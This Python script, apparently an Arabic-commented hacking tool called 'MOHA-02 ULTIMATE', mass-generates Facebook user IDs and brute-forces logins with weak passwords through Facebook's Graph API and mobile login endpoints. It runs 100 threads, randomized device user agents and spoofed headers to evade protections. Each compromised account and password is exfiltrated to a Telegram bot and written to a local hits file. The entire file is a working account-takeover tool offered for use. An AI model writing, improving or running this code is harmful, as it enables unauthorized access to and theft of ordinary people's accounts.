# -*- coding: utf-8 -*-
# SYSTEM: MOHA-02 ULTIMATE (HYBRID EDITION)
# DEVELOPER: MOHA AL-SHALFAWI
# YEAR: 2026

import os, sys, time, json, uuid, random, threading, requests, re, hashlib
from queue import Queue
from datetime import datetime
from colorama import Fore, Style, init

# تهيئة الألوان بنمط Cyber
init(autoreset=True)
G = Fore.GREEN
Y = Fore.YELLOW
R = Fore.RED
W = Fore.WHITE
CY = Fore.CYAN
B = Fore.BLUE
MG = Fore.MAGENTA

class MohaUltimateSystem:
    def __init__(self):
        self.queue = Queue()
        self.oks = []
        self.hits = 0
        self.bad = 0
        self.checked = 0
        self.token = ""
        self.chat_id = ""
        self.threads = 100
        self.proxies = []
        self.user_agents = []
        self.version = "3.5.0"
        
        # خريطة السنوات المطورة (أدق من أي أداة أخرى)
        self.creation_map = {
            "7": "2006", "8": "2007", "9": "2008", "10": "2008",
            "1000000": "2009", "1000001": "2009", "1000002": "2009",
            "1000003": "2009", "1000004": "2009", "1000005": "2009",
            "1000006": "2010", "1000007": "2010", "1000008": "2010",
            "1000009": "2010", "100001": "2010", "100002": "2011",
            "100003": "2011", "100004": "2012", "100005": "2013",
            "100006": "2013", "100007": "2014", "100008": "2014",
            "100009": "2015", "10001": "2016", "10002": "2017"
        }
        self.generate_advanced_agents()

    def generate_advanced_agents(self):
        """توليد هويات أجهزة معقدة لتخطي الحماية"""
        for _ in range(500):
            model = random.choice(["SM-G960F", "SM-A515F", "Pixel 4 XL", "Redmi Note 9 Pro", "Infinix X688B"])
            build = "".join(random.choices("ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789", k=6))
            vers = f"{random.randint(100, 128)}.0.{random.randint(4000, 6000)}.{random.randint(10, 150)}"
            ua = f"Mozilla/5.0 (Linux; Android {random.randint(8, 13)}; {model} Build/{build}) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/{vers} Mobile Safari/537.36"
            self.user_agents.append(ua)

    def linex(self):
        print(f"{CY}="*60)

    def clear_screen(self):
        os.system('clear' if os.name == 'posix' else 'cls')

    def print_logo(self):
        self.clear_screen()
        logo = f"""
{G} ███▄    █  ██████  ▄▄▄█████▓ ▄████▄   █    ██  ██▀███  
{G} ██ ▀█   █▒██    ▒  ▓  ██▒ ▓▒▒██▀ ▀█   ██  ▓██▒▓██ ▒ ██▒
{Y}▓██  ▀█ ██▒░ ▓██▄   ▒ ▓██░ ▒░▒▓█    ▄ ▓██  ▒██░▓██ ░▄█ ▒
{Y}▓██▒  ▐▌██▒  ▒   ██▒░ ▓██▓ ░ ▒▓▓▄ ▄██▒▓▓█  ░██░▒██▀▀█▄  
{G}▒██░   ▓██░▒██████▒▒  ▒██▒ ░ ▒ ▓███▀ ░▒▒█████▓ ░██▓ ▒██▒
{W}---------------------------------------------------------
{Y}[#] DEVELOPER : MOHA AL-SHALFAWI (CHLEF)
{Y}[#] SYSTEM    : MOHA-02 ULTIMATE HYBRID v{self.version}
{Y}[#] ENGINE    : MULTI-CORE THREADING (100+)
{W}---------------------------------------------------------"""
        print(logo)

    def get_year(self, uid):
        uid = str(uid)
        length = len(uid)
        if length in [7, 8, 9, 10]:
            return self.creation_map.get(str(length), "Unknown")
        for key in sorted(self.creation_map.keys(), key=len, reverse=True):
            if uid.startswith(key):
                return self.creation_map[key]
        return "2019-2025"

    def uid_generator(self):
        print(f"\n{CY}[1] {W}OLD ACCOUNTS (2009-2010) | {G}HIGH SUCCESS")
        print(f"{CY}[2] {W}VINTAGE SERIES (2011-2015) | {G}STABLE")
        print(f"{CY}[3] {W}RANDOM GLOBAL SCAN         | {Y}MIXED")
        self.linex()
        choice = input(f"{G}[+] Target Option: ")
        limit = int(input(f"{G}[+] Count (Max 100k): "))
        
        print(f"{Y}[*] Injecting {limit} UIDs into Queue...")
        for _ in range(limit):
            if choice == '1':
                prefix = "1000004"
                self.queue.put(prefix + "".join(random.choices("0123456789", k=8)))
            elif choice == '2':
                prefix = random.choice(["100001", "100002", "100003"])
                self.queue.put(prefix + "".join(random.choices("0123456789", k=9)))
            else:
                self.queue.put("10000" + "".join(random.choices("0123456789", k=10)))

    def method_one(self, uid):
        """Advanced Graph API Logic"""
        for pw in [uid, '123456', '12345678', '556677', 'first last']:
            if self.checked % 30 == 0: self.proxy_rotation()
            
            headers = {
                "User-Agent": random.choice(self.user_agents),
                "Content-Type": "application/x-www-form-urlencoded",
                "Host": "graph.facebook.com",
                "X-FB-Net-HNI": str(random.randint(20000, 40000)),
                "X-FB-SIM-HNI": str(random.randint(20000, 40000)),
                "X-FB-Connection-Type": "WIFI",
            }
            
            # محاكاة توقيع تطبيق حقيقي (Sig Generation)
            data = {
                "access_token": "350685531728|62f8ce9f74b12f84c123cc23437a4a32",
                "format": "json", "sdk_version": "2", "email": uid, "password": pw,
                "generate_session_cookies": "1", "sig": hashlib.md5(str(random.random()).encode()).hexdigest()
            }
            
            try:
                response = requests.post("https://graph.facebook.com/auth/login", data=data, headers=headers).json()
                if "access_token" in response:
                    year = self.get_year(uid)
                    hit = f"✅ [MOHA-HIT] {uid} | {pw} | {year}"
                    print(f"\r{G}{hit}{W}")
                    self.hits += 1
                    self.send_telegram_result(hit)
                    self.save_hit(hit)
                    break
                elif "www.facebook.com" in response.get("error_msg", ""):
                    print(f"\r{Y}[CP] {uid} | {pw}{W}")
                    self.bad += 1
                    break
            except: pass
        self.checked += 1

    def method_two(self, uid):
        """Professional Mobile Simulation Logic"""
        for pw in [uid, '123456', '12345678', 'password']:
            session = requests.Session()
            ua = random.choice(self.user_agents)
            try:
                res = session.get('https://m.facebook.com/login.php', headers={'User-Agent': ua}).text
                payload = {
                    "lsd": re.search('name="lsd" value="(.*?)"', str(res)).group(1),
                    "jazoest": re.search('name="jazoest" value="(.*?)"', str(res)).group(1),
                    "email": uid, "pass": pw, "login": "Log In"
                }
                post = session.post('https://m.facebook.com/login/device-based/regular/login/', data=payload, headers={'User-Agent': ua}, allow_redirects=False)
                if "c_user" in session.cookies.get_dict():
                    year = self.get_year(uid)
                    hit = f"🔥 [MOHA-PRO] {uid} | {pw} | {year}"
                    print(f"\r{G}{hit}{W}")
                    self.hits += 1
                    self.send_telegram_result(hit); self.save_hit(hit)
                    break
            except: pass
        self.checked += 1

    def proxy_rotation(self):
        if self.proxies: return {"http": random.choice(self.proxies)}
        return None

    def send_telegram_result(self, text):
        try: requests.post(f"https://api.telegram.org/bot{self.token}/sendMessage", data={"chat_id": self.chat_id, "text": text})
        except: pass

    def save_hit(self, data):
        with open("MOHA_HITS.txt", "a") as f: f.write(data + "\n")

    def run_main_system(self):
        self.print_logo()
        print(f"{G}[+] CONFIGURE TELEGRAM BOT")
        self.token = input(f"{Y}[?] Token: {W}")
        self.chat_id = input(f"{Y}[?] Chat ID: {W}")
        
        self.print_logo()
        self.uid_generator()
        
        self.print_logo()
        print(f"{CY}[1] METHOD 1 (ULTRA FAST - GRAPH)")
        print(f"{CY}[2] METHOD 2 (STABLE - BROWSER)")
        m_choice = input(f"\n{G}[+] Select: ")
        self.threads = int(input(f"{G}[+] Threads (100): ") or 100)
        
        print(f"{Y}[*] Starting Engine...")
        self.linex()
        
        for _ in range(self.threads):
            t = threading.Thread(target=self.engine_logic, args=(m_choice,))
            t.daemon = True
            t.start()
            
        while not self.queue.empty():
            time.sleep(1)
            sys.stdout.write(f"\r{W}[{G}MOHA{W}] {G}OK:{self.hits} {W}| {Y}CH:{self.checked} {W}| {R}BD:{self.bad} ")
            sys.stdout.flush()
            
        print(f"\n{G}━━━━━━━━━━━━━ SCAN COMPLETE ━━━━━━━━━━━━━")

    def engine_logic(self, mode):
        while not self.queue.empty():
            uid = self.queue.get()
            if mode == '1': self.method_one(uid)
            else: self.method_two(uid)
            self.queue.task_done()

if __name__ == "__main__":
    app = MohaUltimateSystem()
    app.run_main_system()
